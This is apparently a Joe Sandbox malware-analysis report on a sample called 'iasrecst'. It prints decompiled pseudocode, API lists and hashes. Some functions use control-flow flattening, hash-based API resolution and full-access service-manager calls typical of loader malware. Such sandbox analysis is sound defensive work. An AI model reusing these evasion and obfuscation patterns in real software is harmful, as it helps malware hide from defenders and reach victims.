Associated: 00000001.00000002.496676614.00000000022C0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496717188.00000000022CD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496745488.00000000022D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_22c0000_iasrecst.jbxd

Yara matches

Similarity

API ID: Process$CurrentFullImageNameQuerylstrcmpi
String ID: 79V#
API String ID: 3605714105-696535739
Opcode ID: 82b8e0415766160c2c4a34803a5e0fdee9acaa98903f34ce13e4bd60f8d4d5ee
Instruction ID: 4a81d525f056dcebbba21a338bad60595bef654234dd9f6d185dd3d3c15dd31e
Opcode Fuzzy Hash: 82b8e0415766160c2c4a34803a5e0fdee9acaa98903f34ce13e4bd60f8d4d5ee
Instruction Fuzzy Hash: FD31EA76B602049BD724EBE8E8947BA22D6ABC4754F344E2EF441CB248DB71DD44CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00425FF1, Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 90%

			E00425FF1() {
				unsigned int _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				long _t28;
				void* _t40;
				void* _t50;

				_t50 = 0x439be0;
				_t18 = GetVersion();
				 *0x00439C34 = (_t18 & 0x000000ff) + ((_t18 & 0x000000ff) << 8);
				 *0x00439C38 = _t18 >> 0x1f;
				asm("sbb eax, eax");
				_t40 = 1;
				_t19 = _t18 + 1;
				 *0x00439C3C = _t19;
				 *0x00439C40 = _t40 - _t19;
				 *0x00439C44 = _t19;
				 *0x00439C48 = 0;
				if(_t19 != 0) {
					_t28 = GetProcessVersion(0); // executed
					asm("sbb eax, eax");
					 *((intOrPtr*)(0x439c48)) = _t28 + 1;
				}
				E004171BC(_t50);
				 *((intOrPtr*)(_t50 + 0x24)) = 0;
				E00417178(_t50);
				 *((intOrPtr*)(_t50 + 0x3c)) = LoadCursorA(0, 0x7f02);
				 *((intOrPtr*)(_t50 + 0x40)) = LoadCursorA(0, 0x7f00);
				 *((intOrPtr*)(_t50 + 0x50)) = 0;
				 *((intOrPtr*)(_t50 + 0x44)) = 0;
				_t26 = (0 |  *((intOrPtr*)(_t50 + 0x5c)) != 0x00000000) + 1;
				 *((intOrPtr*)(_t50 + 0x10)) = _t26;
				 *((intOrPtr*)(_t50 + 0x14)) = _t26;
				return _t50;
			}

APIs

GetVersion.KERNEL32(?,?,?,00425FEC), ref: 00426068
GetProcessVersion.KERNELBASE(00000000,?,?,?,00425FEC), ref: 004260A5
LoadCursorA.USER32 ref: 004260D3
LoadCursorA.USER32 ref: 004260DE

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: CursorLoadVersion$Process
String ID:
API String ID: 2246821583-0
Opcode ID: 6ae578300c1fd388cde0746a419bc37b446ef5b23384ceea8f5f1ab27520ebf6
Instruction ID: b544fc3fc140862069c0e5c3025fa315675d99968a939774a25cb551b1266f67
Opcode Fuzzy Hash: 6ae578300c1fd388cde0746a419bc37b446ef5b23384ceea8f5f1ab27520ebf6
Instruction Fuzzy Hash: 2C113AB1A047608FD728DF3A989452ABBE5FB48704751493FE18BC6B50D778A441CB98

Uniqueness

Uniqueness Score: -1.00%

Function 004080E7, Relevance: 6.1, APIs: 4, Instructions: 53
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004080E7() {
				signed int _t15;
				void* _t17;
				void* _t19;
				void* _t25;
				signed int _t26;
				void* _t27;
				intOrPtr* _t29;

				_t15 =  *0x43b634; // 0x1
				_t26 =  *0x43b624; // 0x10
				if(_t15 != _t26) {
					L3:
					_t27 =  *0x43b638; // 0x7005a8
					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
					_t17 = RtlAllocateHeap( *0x43b63c, 8, 0x41c4); // executed
					 *(_t29 + 0x10) = _t17;
					if(_t17 == 0) {
						L6:
						return 0;
					}
					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4); // executed
					 *(_t29 + 0xc) = _t19;
					if(_t19 != 0) {
						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
						 *_t29 = 0;
						 *((intOrPtr*)(_t29 + 4)) = 0;
						 *0x43b634 =  *0x43b634 + 1;
						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
						return _t29;
					}
					HeapFree( *0x43b63c, 0,  *(_t29 + 0x10));
					goto L6;
				}
				_t2 = _t26 * 4; // 0x60
				_t25 = HeapReAlloc( *0x43b63c, 0,  *0x43b638, _t26 + _t2 + 0x50 << 2);
				if(_t25 == 0) {
					goto L6;
				}
				 *0x43b624 =  *0x43b624 + 0x10;
				 *0x43b638 = _t25;
				_t15 =  *0x43b634; // 0x1
				goto L3;
			}

APIs

HeapReAlloc.KERNEL32(00000000,00000060,00000000,00000000,00407EAF,00000000,?,?,?,004063F8), ref: 0040810F
RtlAllocateHeap.NTDLL(00000008,000041C4,00000000,00000000,00407EAF,00000000,?,?,?,004063F8), ref: 00408143
VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004,?,004063F8), ref: 0040815D
HeapFree.KERNEL32(00000000,?,?,004063F8), ref: 00408174

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: Heap$Alloc$AllocateFreeVirtual
String ID:
API String ID: 1005975451-0
Opcode ID: 1221898d1fef6688b0745aebfb4c1bb27194800098e600c79b41635115f9dbec
Instruction ID: 7ee1ac0be71f7df2db9aeb831ea59f9b1f4a4243ff11ed4a701e61ad5814e4f6
Opcode Fuzzy Hash: 1221898d1fef6688b0745aebfb4c1bb27194800098e600c79b41635115f9dbec
Instruction Fuzzy Hash: 4A115870200301AFC7318F18EC46E6A7BB6FB947207505A3DF296DA1B1C770A813CB89

Uniqueness

Uniqueness Score: -1.00%

Function 022C99A0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 60%

			E022C99A0() {
				short _v520;
				void* _v524;
				void* _v528;
				char _v532;
				void* _t11;
				intOrPtr* _t12;
				void* _t18;
				intOrPtr* _t20;
				intOrPtr* _t25;
				intOrPtr* _t27;
				intOrPtr _t31;
				intOrPtr* _t33;
				intOrPtr* _t38;
				intOrPtr _t41;
				void* _t45;
				intOrPtr* _t59;
				intOrPtr _t63;
				void* _t79;
				void* _t80;
				void* _t82;

				_t79 = _v528;
				_t11 = 0x1e395e13;
				while(1) {
					_t82 = _t11 - 0x1f18c325;
					if(_t82 > 0) {
						goto L24;
					}
					L2:
					if(_t82 == 0) {
						_t25 =  *0x22cde58;
						if(_t25 == 0) {
							_t25 = E022C3E80(_t45, E022C3F20(0xbb398380), 0xb1aefb5, _t80);
							 *0x22cde58 = _t25;
						}
						 *_t25(0,  &_v520, 0x104);
						_t27 =  *0x22cdc3c;
						if(_t27 == 0) {
							_t27 = E022C3E80(_t45, E022C3F20(0x7539f5a2), 0x3f129d89, _t80);
							 *0x22cdc3c = _t27;
						}
						 *((short*)( *_t27( &_v532))) = 0;
						_t11 = 0x32a2459b;
						continue;
					} else {
						if(_t11 == 0x3932e9b) {
							_t31 =  *0x22ce2f0; // 0x763428
							_v528 =  *(_t31 + 0x3c);
							_t33 =  *0x22cdb04;
							_v524 = _t79;
							if(_t33 == 0) {
								_t33 = E022C3E80(_t45, E022C3F20(0xbb398380), 0x7436592b, _t80);
								 *0x22cdb04 = _t33;
							}
							_push(0xffffffff);
							_push(0);
							_push( &_v528);
							_push(2);
							if( *_t33() == 0) {
								L37:
								return 0;
							} else {
								_t11 =  ==  ? 0x18584b48 : 0x3932e9b;
								continue;
							}
						} else {
							if(_t11 == 0x18584b48) {
								if(E022C9C10(_t80) == 0) {
									_t38 =  *0x22cdcdc; // 0x0
									if(_t38 == 0) {
										_t38 = E022C3E80(_t45, E022C3F20(0xbb398380), 0xcaaeebbc, _t80);
										 *0x22cdcdc = _t38;
									}
									 *_t38(_t79);
									L14:
									_t11 = 0x3932e9b;
								} else {
									_t59 =  *0x22cdff4; // 0x0
									if(_t59 == 0) {
										_t59 = E022C3E80(_t45, E022C3F20(0xbb398380), 0x1186b083, _t80);
										 *0x22cdff4 = _t59;
									}
									_t41 =  *0x22ce2f0; // 0x763428
									 *_t59( *((intOrPtr*)(_t41 + 0x3c)));
									_t11 = 0x2713957b;
								}
								continue;
							} else {
								if(_t11 == 0x1e395e13) {
									_t11 = 0x1f18c325;
									continue;
									do {
										while(1) {
											_t82 = _t11 - 0x1f18c325;
											if(_t82 > 0) {
												goto L24;
											}
											goto L2;
										}
										goto L24;
									} while (_t11 != 0x2707225a);
									return 0;
								}
							}
						}
					}
					L38:
					L24:
					if(_t11 == 0x2713957b) {
						_t12 =  *0x22cdf90; // 0x0
						if(_t12 == 0) {
							_t12 = E022C3E80(_t45, E022C3F20(0xbb398380), 0x5f1f4281, _t80);
							 *0x22cdf90 = _t12;
						}
						 *_t12(_t79);
						goto L37;
					} else {
						if(_t11 != 0x32a2459b) {
							goto L32;
						} else {
							if( *0x22cdca8 == 0) {
								 *0x22cdca8 = E022C3E80(_t45, E022C3F20(0xbb398380), 0x39bd4dfe, _t80);
							}
							_t18 = FindFirstChangeNotificationW( &_v520, 0, 1); // executed
							_t79 = _t18;
							if(E022C9C10(_t80) == 0) {
								goto L14;
							} else {
								_t20 =  *0x22cdff4; // 0x0
								if(_t20 == 0) {
									_t20 = E022C3E80(_t45, E022C3F20(0xbb398380), 0x1186b083, _t80);
									 *0x22cdff4 = _t20;
								}
								_t63 =  *0x22ce2f0; // 0x763428
								 *_t20( *((intOrPtr*)(_t63 + 0x3c)));
								_t11 = 0x2713957b;
							}
							continue;
						}
					}
					goto L38;
				}
			}

0x022c99a7
0x022c99ab
0x022c99c0
0x022c99c0
0x022c99c5
0x00000000
0x00000000
0x022c99cb
0x022c99cb
0x022c9ac3
0x022c9aca
0x022c9add
0x022c9ae2
0x022c9ae2
0x022c9af3
0x022c9af5
0x022c9afc
0x022c9b0f
0x022c9b14
0x022c9b14
0x022c9b22
0x022c9b25
0x00000000
0x022c99d1
0x022c99d6
0x022c9a68
0x022c9a70
0x022c9a74
0x022c9a79
0x022c9a7f
0x022c9a92
0x022c9a97
0x022c9a97
0x022c9a9c
0x022c9a9e
0x022c9aa4
0x022c9aa5
0x022c9aad
0x022c9bf8
0x022c9c01
0x022c9ab3
0x022c9abb
0x00000000
0x022c9abb
0x022c99dc
0x022c99e1
0x022c99fc
0x022c9a37
0x022c9a3e
0x022c9a51
0x022c9a56
0x022c9a56
0x022c9a5c
0x022c9a5e
0x022c9a5e
0x022c99fe
0x022c99fe
0x022c9a06
0x022c9a1e
0x022c9a20
0x022c9a20
0x022c9a26
0x022c9a2e
0x022c9a30
0x022c9a30
0x00000000
0x022c99e3
0x022c99e8
0x022c99ee
0x022c99f3
0x022c99c0
0x022c99c0
0x022c99c0
0x022c99c5
0x00000000
0x00000000
0x00000000
0x022c99c5
0x00000000
0x022c99c0
0x022c9bcd
0x022c9bcd
0x022c99e8
0x022c99e1
0x022c99d6
0x00000000
0x022c9b2f
0x022c9b34
0x022c9bd0
0x022c9bd7
0x022c9bea
0x022c9bef
0x022c9bef
0x022c9bf5
0x00000000
0x022c9b3a
0x022c9b3f
0x00000000
0x022c9b41
0x022c9b48
0x022c9b60
0x022c9b60
0x022c9b6e
0x022c9b70
0x022c9b79
0x00000000
0x022c9b7f
0x022c9b7f
0x022c9b86
0x022c9b99
0x022c9b9e
0x022c9b9e
0x022c9ba3
0x022c9bac
0x022c9bae
0x022c9bae
0x00000000
0x022c9b79
0x022c9b3f
0x00000000
0x022c9b34

APIs

FindFirstChangeNotificationW.KERNELBASE(?,00000000,00000001), ref: 022C9B6E

Strings

+Y6t, xrefs: 022C9A8B
(4v, xrefs: 022C9A26, 022C9A68, 022C9BA3

Memory Dump Source

Source File: 00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp, Offset: 022C0000, based on PE: true

Associated: 00000001.00000002.496676614.00000000022C0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496717188.00000000022CD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496745488.00000000022D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_22c0000_iasrecst.jbxd

Yara matches

Similarity

API ID: ChangeFindFirstNotification
String ID: (4v$+Y6t
API String ID: 1065410024-814569859
Opcode ID: 8b72d205325235fff75e073af6fa14f56eb398afdfded55f6e64fd0442c32321
Instruction ID: c654d4510e864cf75e502bf8aaf00e94a4a5f0a39c718ddf8339ba2db244ef96
Opcode Fuzzy Hash: 8b72d205325235fff75e073af6fa14f56eb398afdfded55f6e64fd0442c32321
Instruction Fuzzy Hash: BD518774B60202ABDB18DAE8B89477E72966F84304B304E2DF445CB288EF71C950CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 00426474, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00426474(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char _a16) {
				signed short _t13;
				void* _t16;
				intOrPtr _t18;
				void* _t20;
				intOrPtr _t29;

				_t13 = SetErrorMode(0); // executed
				SetErrorMode(_t13 | 0x00008001); // executed
				_t16 = E00424BFB();
				_t29 = _a4;
				 *((intOrPtr*)(_t16 + 8)) = _t29;
				 *((intOrPtr*)(_t16 + 0xc)) = _t29;
				_t18 =  *((intOrPtr*)(E00424BFB() + 4));
				_t31 = _t18;
				if(_t18 != 0) {
					 *((intOrPtr*)(_t18 + 0x68)) = _t29;
					 *((intOrPtr*)(_t18 + 0x6c)) = _a8;
					 *((intOrPtr*)(_t18 + 0x70)) = _a12;
					_t10 =  &_a16; // 0x406468
					 *((intOrPtr*)(_t18 + 0x74)) =  *_t10;
					E004264D7(_t18, _t31);
				}
				if( *((char*)(E00424BFB() + 0x14)) == 0) {
					E00412710();
				}
				_t20 = 1;
				return _t20;
			}

APIs

SetErrorMode.KERNELBASE(00000000,00000000,0041845B,00000000,00000000,00000000,00000000,?,00000000,?,0040ECAE,00000000,00000000,00000000,00000000,00406468), ref: 0042647D
SetErrorMode.KERNELBASE(00000000,?,00000000,?,0040ECAE,00000000,00000000,00000000,00000000,00406468,00000000), ref: 00426484

Part of subcall function 004264D7: GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 00426508
Part of subcall function 004264D7: lstrcpyA.KERNEL32(?,.HLP,?,?,00000104), ref: 004265A9
Part of subcall function 004264D7: lstrcatA.KERNEL32(?,.INI,?,?,00000104), ref: 004265D6

Strings

hd@, xrefs: 004264B2

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: ErrorMode$FileModuleNamelstrcatlstrcpy
String ID: hd@
API String ID: 3389432936-3469257913
Opcode ID: cd2bf83e0aada7a78a64cd33e34dd8ad1fec100a5d14c2182ee5260116b148ae
Instruction ID: 56c02cd2a0ca812c609797d7f3c2b0aa536ab85d6a731917afc158bbbb4402dc
Opcode Fuzzy Hash: cd2bf83e0aada7a78a64cd33e34dd8ad1fec100a5d14c2182ee5260116b148ae
Instruction Fuzzy Hash: F2F04F71A043205FD714FF25E484B0A7BD4AF44714F06844FF4889B3A2CBB8E841CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 022C96B0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E022C96B0() {
				char _v524;
				unsigned int _v528;
				char _v536;
				void* _v544;
				void* __ebx;
				void* _t44;
				void* _t47;
				void* _t48;
				void* _t51;
				void* _t53;
				void* _t61;
				void* _t62;
				void* _t66;
				void* _t69;
				intOrPtr _t71;
				void* _t73;
				intOrPtr _t79;
				void* _t87;
				void* _t90;
				signed int _t103;
				void* _t116;
				void* _t117;
				void* _t118;
				void* _t121;
				void* _t122;

				_t117 = _v528;
				_t44 = 0x290b7473;
				_t116 = 0;
				_t2 = _t116 + 1; // 0x1
				_t79 = _t2;
				goto L1;
				do {
					while(1) {
						L1:
						_t121 = _t44 - 0x185037e0;
						if(_t121 > 0) {
							break;
						}
						if(_t121 == 0) {
							_v528 = 0x9fb;
							_v528 = _v528 ^ 0xe4a1a680;
							_v528 = _v528 << 0xd;
							_v528 = _v528 + 0xffffacfd;
							_t80 = _v528;
							_t44 = 0xac9ce62;
							_v528 = (_v528 - (0x2f684bdb * _t80 >> 0x20) >> 1) + (0x2f684bdb * _t80 >> 0x20) >> 4;
							_v528 = _v528 << 5;
							_v528 = _v528 ^ 0x3febe949;
							continue;
						} else {
							_t122 = _t44 - 0xac9ce62;
							if(_t122 > 0) {
								__eflags = _t44 - 0x143d843a;
								if(_t44 != 0x143d843a) {
									goto L32;
								} else {
									E022C7AB0(_t118);
									_t44 = 0x28458a2;
									continue;
								}
							} else {
								if(_t122 == 0) {
									_t66 =  *0x22cddb8;
									__eflags = _t66;
									if(_t66 == 0) {
										_t66 = E022C3E80(_t79, E022C3F20(0x667fdee), 0x505cb3fe, _t118);
										 *0x22cddb8 = _t66;
									}
									 *_t66(_t117);
									_t44 = 0x67ba340;
									continue;
								} else {
									if(_t44 == 0x28458a2) {
										_t69 =  *0x22cde58;
										__eflags = _t69;
										if(_t69 == 0) {
											_t69 = E022C3E80(_t79, E022C3F20(0xbb398380), 0xb1aefb5, _t118);
											 *0x22cde58 = _t69;
										}
										 *_t69(0,  &_v524, 0x104);
										_t71 = E022C3D10( &_v536);
										_t87 =  *0x22ce2ec; // 0x7720d0
										 *((intOrPtr*)(_t87 + 0x48)) = _t71;
										_t44 = 0x311c267c;
										continue;
									} else {
										if(_t44 != 0x67ba340) {
											goto L32;
										} else {
											_t90 =  *0x22cdf38;
											if(_t90 == 0) {
												_t90 = E022C3E80(_t79, E022C3F20(0xf9c30097), 0x62c574d8, _t118);
												 *0x22cdf38 = _t90;
											}
											_t73 =  *0x22ce2ec; // 0x7720d0
											 *_t90(0, _v528, 0, 0, _t73 + 0x5c); // executed
											_t44 = 0x143d843a;
											_t116 =  ==  ? _t79 : _t116;
											continue;
										}
									}
								}
							}
						}
						L38:
					}
					__eflags = _t44 - 0x311c267c;
					if(__eflags > 0) {
						__eflags = _t44 - 0x37104f21;
						if(_t44 != 0x37104f21) {
							goto L32;
						} else {
							__eflags =  *0x22ce0f4;
							if( *0x22ce0f4 == 0) {
								 *0x22ce0f4 = E022C3E80(_t79, E022C3F20(0x667fdee), 0x7f692adf, _t118);
							}
							_t47 = OpenSCManagerW(0, 0, 0xf003f); // executed
							_t117 = _t47;
							__eflags = _t117;
							if(_t117 == 0) {
								_t44 = 0x25965b99;
							} else {
								_t48 =  *0x22ce2ec; // 0x7720d0
								 *((intOrPtr*)(_t48 + 0x268)) = _t79;
								_t44 = 0x185037e0;
							}
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							_t51 =  *0x22cdf38;
							__eflags = _t51;
							if(_t51 == 0) {
								_t51 = E022C3E80(_t79, E022C3F20(0xf9c30097), 0x62c574d8, _t118);
								 *0x22cdf38 = _t51;
							}
							 *_t51(0, 0x25, 0, 0,  &_v524);
							_t53 =  *0x22ce2ec; // 0x7720d0
							__eflags = _t53 + 0x10;
							E022C3070(_t53 + 0x10);
							goto L37;
						} else {
							__eflags = _t44 - 0x25965b99;
							if(_t44 == 0x25965b99) {
								_v528 = 0x4b7f;
								_v528 = _v528 + 0xffffece0;
								_t103 = (_v528 - (0x3521cfb3 * _v528 >> 0x20) >> 1) + (0x3521cfb3 * _v528 >> 0x20) >> 5;
								_v528 = _t103;
								_v528 = (_t103 << 5) + _v528;
								_v528 = _v528 >> 2;
								_v528 = _v528 ^ 0x000008d8;
								_t61 =  *0x22ce2ec; // 0x7720d0
								 *((intOrPtr*)(_t61 + 0x3c)) = 0x22c7c60;
								_t44 = 0x67ba340;
								goto L1;
							} else {
								__eflags = _t44 - 0x290b7473;
								if(_t44 != 0x290b7473) {
									goto L32;
								} else {
									_t62 = E022C42F0(_t79, 0x480);
									 *0x22ce2ec = _t62;
									__eflags = _t62;
									if(_t62 == 0) {
										L37:
										return _t116;
									} else {
										 *((intOrPtr*)(_t62 + 0x38)) = E022C7C70;
										_t44 = 0x37104f21;
										goto L1;
									}
								}
							}
						}
					}
					goto L38;
					L32:
					__eflags = _t44 - 0x20400186;
				} while (_t44 != 0x20400186);
				return _t116;
				goto L38;
			}

0x022c96b8
0x022c96bc
0x022c96c2
0x022c96c4
0x022c96c4
0x022c96c7
0x022c96d0
0x022c96d0
0x022c96d0
0x022c96d0
0x022c96d5
0x00000000
0x00000000
0x022c96db
0x022c97e7
0x022c97f4
0x022c97fc
0x022c9801
0x022c9809
0x022c980f
0x022c981d
0x022c9821
0x022c9826
0x00000000
0x022c96e1
0x022c96e1
0x022c96e6
0x022c97cd
0x022c97d2
0x00000000
0x022c97d8
0x022c97d8
0x022c97dd
0x00000000
0x022c97dd
0x022c96ec
0x022c96ec
0x022c979c
0x022c97a1
0x022c97a3
0x022c97b6
0x022c97bb
0x022c97bb
0x022c97c1
0x022c97c3
0x00000000
0x022c96f2
0x022c96f7
0x022c974e
0x022c9753
0x022c9755
0x022c9768
0x022c976d
0x022c976d
0x022c977e
0x022c9784
0x022c9789
0x022c978f
0x022c9792
0x00000000
0x022c96f9
0x022c96fe
0x00000000
0x022c9704
0x022c9704
0x022c970c
0x022c9724
0x022c9726
0x022c9726
0x022c972c
0x022c9740
0x022c9744
0x022c9749
0x00000000
0x022c9749
0x022c96fe
0x022c96f7
0x022c96ec
0x022c96e6
0x00000000
0x022c96db
0x022c9833
0x022c9838
0x022c98d6
0x022c98db
0x00000000
0x022c98dd
0x022c98e2
0x022c98e4
0x022c98fc
0x022c98fc
0x022c990a
0x022c990c
0x022c990e
0x022c9910
0x022c9927
0x022c9912
0x022c9912
0x022c9917
0x022c991d
0x022c991d
0x00000000
0x022c9910
0x022c983e
0x022c983e
0x022c9948
0x022c994d
0x022c994f
0x022c9962
0x022c9967
0x022c9967
0x022c9979
0x022c997b
0x022c9984
0x022c9988
0x00000000
0x022c9844
0x022c9844
0x022c9849
0x022c987e
0x022c988b
0x022c989f
0x022c98a2
0x022c98af
0x022c98b3
0x022c98b8
0x022c98c0
0x022c98c5
0x022c98cc
0x00000000
0x022c984b
0x022c984b
0x022c9850
0x00000000
0x022c9856
0x022c985b
0x022c9860
0x022c9865
0x022c9867
0x022c9990
0x022c999b
0x022c986d
0x022c986d
0x022c9874
0x00000000
0x022c9874
0x022c9867
0x022c9850
0x022c9849
0x022c983e
0x00000000
0x022c9931
0x022c9931
0x022c9931
0x022c9947
0x00000000

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,00000000,2564BE4F), ref: 022C990A

Strings

I?, xrefs: 022C9826

Memory Dump Source

Source File: 00000001.00000002.496688716.00000000022C1000.00000020.00000001.sdmp, Offset: 022C0000, based on PE: true

Associated: 00000001.00000002.496676614.00000000022C0000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496717188.00000000022CD000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.496745488.00000000022D0000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_22c0000_iasrecst.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: I?
API String ID: 1889721586-46180575
Opcode ID: 8d55f4295583d6fc2360f4c13c049fd37ad62011d4544ac5f55014aebed4b069
Instruction ID: f0e99b0f0112b635c26b6e791bc6d49278bdfc7cdf40a6927dd7866b3880bb34
Opcode Fuzzy Hash: 8d55f4295583d6fc2360f4c13c049fd37ad62011d4544ac5f55014aebed4b069
Instruction Fuzzy Hash: 2A6105B17243419FD728EEE9948577B73A5AB80314F708A2DF556CB288DB74D844CF82

Uniqueness

Uniqueness Score: -1.00%

Function 022C6FB0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107
libraryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E022C6FB0(void* __ebx) {
				void* _t2;
				struct HINSTANCE__* _t5;
				intOrPtr* _t6;
				intOrPtr* _t8;
				void* _t21;
				intOrPtr _t28;
				void* _t48;
				WCHAR* _t51;
				void* _t53;
				void* _t54;
				void* _t55;

				_t21 = __ebx;
				_t2 = 0x2f7561b9;
				goto L1;
				do {
					while(1) {
						L1:
						_t54 = _t2 - 0x16eb9dc5;
						if(_t54 > 0) {
							break;
						}
						if(_t54 == 0) {
							E022C6F10(_t21, 0x22cd770, 4, __eflags);
							_t2 = 0x28da268b;
							continue;
						} else {
							_t55 = _t2 - 0x96aa655;
							if(_t55 > 0) {
								__eflags = _t2 - 0x129c963b;
								if(__eflags != 0) {
									goto L21;
								} else {
									E022C6F10(_t21, 0x22cd7c0, 3, __eflags);
									_t2 = 0x16eb9dc5;
									continue;
								}
							} else {
								if(_t55 == 0) {
									E022C6F10(_t21, 0x22cd840, 1, __eflags);
									_t2 = 0x6462a46;
									continue;
								} else {
									if(_t2 == 0x34398df) {
										E022C6F10(_t21, 0x22cd820, 0, __eflags);
										_t2 = 0x96aa655;
										continue;
									} else {
										_t57 = _t2 - 0x6462a46;
										if(_t2 != 0x6462a46) {
											goto L21;
										} else {
											E022C6F10(_t21, 0x22cd890, 2, _t57);
											_t2 = 0x129c963b;
											continue;
										}
									}
								}
							}
						}
						L30:
					}
					__eflags = _t2 - 0x2cd0d411;
					if(__eflags > 0) {
						__eflags = _t2 - 0x2f7561b9;
						if(__eflags != 0) {
							goto L21;
						} else {
							_t2 = 0x34398df;
							goto L1;
						}
					} else {
						if(__eflags == 0) {
							_t51 = E022C34C0(0x22cd7f0);
							__eflags =  *0x22cddc4;
							if( *0x22cddc4 == 0) {
								 *0x22cddc4 = E022C3E80(_t21, E022C3F20(0xbb398380), 0x9261db99, _t53);
							}
							_t5 = LoadLibraryW(_t51);
							_t28 =  *0x22ce2e8; // 0x762ee0
							 *(_t28 + 0x28) = _t5;
							_t6 =  *0x22cdea8;
							__eflags = _t6;
							if(_t6 == 0) {
								_t6 = E022C3E80(_t21, E022C3F20(0xbb398380), 0x97f883e, _t53);
								 *0x22cdea8 = _t6;
							}
							_t48 =  *_t6();
							_t8 =  *0x22ce1a0;
							__eflags = _t8;
							if(_t8 == 0) {
								_t8 = E022C3E80(_t21, E022C3F20(0xbb398380), 0x26c3f343, _t53);
								 *0x22ce1a0 = _t8;
							}
							return  *_t8(_t48, 0, _t51);
						} else {
							__eflags = _t2 - 0x17b18c59;
							if(__eflags == 0) {
								E022C6F10(_t21, 0x22cd870, 6, __eflags);
								_t2 = 0x2cd0d411;
								goto L1;
							} else {
								__eflags = _t2 - 0x28da268b;
								if(__eflags != 0) {
									goto L21;
								} else {
									E022C6F10(_t21, 0x22cd790, 5, __eflags);
									_t2 = 0x17b18c59;
									goto L1;
								}
							}
						}
					}
					goto L30;
					L21:
					__eflags = _t2 - 0x2a0eb481;
				} while (__eflags != 0);
				return _t2;
				goto L30;
			}

0x022c6fb0
0x022c6fb0
0x022c6fb0
0x022c6fb5
0x022c6fb5
0x022c6fb5
0x022c6fb5
0x022c6fba
0x00000000
0x00000000
0x022c6fc0
0x022c704a
0x022c704f
0x00000000
0x022c6fc2
0x022c6fc2
0x022c6fc7
0x022c701c
0x022c7021
0x00000000
0x022c7027
0x022c7031
0x022c7036
0x00000000
0x022c7036
0x022c6fc9
0x022c6fc9
0x022c7010
0x022c7015
0x00000000
0x022c6fcb
0x022c6fd0
0x022c6ffa
0x022c6fff
0x00000000
0x022c6fd2
0x022c6fd2
0x022c6fd7
0x00000000
0x022c6fdd
0x022c6fe7
0x022c6fec
0x00000000
0x022c6fec
0x022c6fd7
0x022c6fd0
0x022c6fc9
0x022c6fc7
0x00000000
0x022c6fc0
0x022c7059
0x022c705e
0x022c70a2
0x022c70a7
0x00000000
0x022c70a9
0x022c70a9
0x00000000
0x022c70a9
0x022c7060
0x022c7060
